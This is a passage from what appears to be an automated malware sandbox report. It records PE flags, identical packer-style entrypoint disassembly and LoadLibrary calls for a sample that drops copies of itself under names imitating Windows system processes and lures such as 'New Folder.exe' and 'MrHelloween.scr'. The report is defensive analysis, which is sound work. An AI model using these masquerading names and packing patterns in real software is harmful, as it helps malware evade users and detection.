IMAGE_FILE_EXECUTABLE\n \"CSRSS .exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4k51k4.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IExplorer.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9C469.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrHelloween.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9C7EE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4K51K4.EXE.67A9C717.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9C46B.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67A9C719.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS .exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"services.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"shell.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4k51k4.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IExplorer.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"New Folder.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Empty.pif\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9C469.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"MrHelloween.scr\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9C7EE.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9C717.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"WINLOGON.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9C46B.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9C719.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005712)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006008)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006008)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL 